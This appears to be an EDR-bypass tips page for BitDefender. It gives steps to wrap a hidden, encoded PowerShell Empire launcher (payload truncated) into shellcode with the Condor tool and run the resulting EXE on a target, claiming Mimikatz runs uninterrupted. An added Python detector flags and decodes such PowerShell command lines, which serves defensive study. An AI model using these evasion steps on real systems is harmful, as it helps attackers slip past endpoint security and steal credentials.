Awesome AV/EDR/XDR Bypass Tips

BitDefender


Last updated 2 years ago

Using Condor + PowerShell Empire

Condor can also bypass BitDefender's EDR, including running PowerShell Empire's own tools, such as Mimikatz, without any interruption.

  1. Open PowerShell Empire and generate a PowerShell payload, for example:

     powershell -Sta -Nop -Window Hidden -EncodedCommand cwB2ACAAbwAgACg...

  2. Run the condor tool with the following command:

     python3 condor.py -p windows/x64/exec

  3. Paste the PowerShell payload to generate the shellcode.

  4. Upload the EXE to the machine and run.
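
For defenders, the PowerShell command line shown in the first step above is itself a detection point. The following is an added example, not code from the original page or from the Condor or Empire projects: it flags process-creation records whose PowerShell switches match that pattern, including abbreviated forms, and decodes the -EncodedCommand value for triage. The sample records, the minimum abbreviation lengths and the two-trait threshold are assumptions of this sketch.

```python
import base64

# Parameter name -> shortest abbreviation this sketch accepts (assumed minimums;
# PowerShell resolves abbreviated parameter names, so exact-string rules miss them).
PARAMS = {"sta": 3, "noprofile": 3, "windowstyle": 1, "encodedcommand": 1}

def parse_switches(cmdline):
    """Map each recognised parameter to the token that follows it."""
    tokens, found = cmdline.split(), {}
    for i, tok in enumerate(tokens):
        if tok[0] not in "-/":
            continue
        name = "enc" if tok[1:].lower() == "ec" else tok[1:].lower()
        for full, minlen in PARAMS.items():
            if len(name) >= minlen and full.startswith(name):
                found[full] = tokens[i + 1] if i + 1 < len(tokens) else ""
    return found

def decode_encoded_command(b64):
    """-EncodedCommand is Base64 over UTF-16LE text; None if it does not decode."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None

def assess(image, cmdline):
    """Return (alert, traits, decoded_script) for one process-creation record."""
    if not any(n in image.lower() for n in ("powershell", "pwsh")):
        return False, [], None
    sw = parse_switches(cmdline)
    traits = [t for t in ("sta", "noprofile") if t in sw]
    if sw.get("windowstyle", "").lower() == "hidden":
        traits.append("hidden-window")
    if "encodedcommand" not in sw:
        return False, traits, None
    # Alert on an encoded command combined with two or more launcher traits.
    return len(traits) >= 2, traits, decode_encoded_command(sw["encodedcommand"])

def _enc(script):  # builds the constructed sample payloads below
    return base64.b64encode(script.encode("utf-16-le")).decode()

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed process-creation records (image path, command line); not real telemetry.
SAMPLES = [
    (PS, "powershell -Sta -Nop -Window Hidden -EncodedCommand " + _enc("Write-Output 'constructed'")),
    (PS, "powershell.exe -nop -w hidden -e " + _enc("Get-Date")),
    (PS, r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"),
]

if __name__ == "__main__":
    for image, cmdline in SAMPLES:
        print(assess(image, cmdline))
```

A truncated or otherwise invalid Base64 value, such as the elided one printed on this page, decodes to `None` rather than raising, so the record can still be alerted on from its switches alone.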
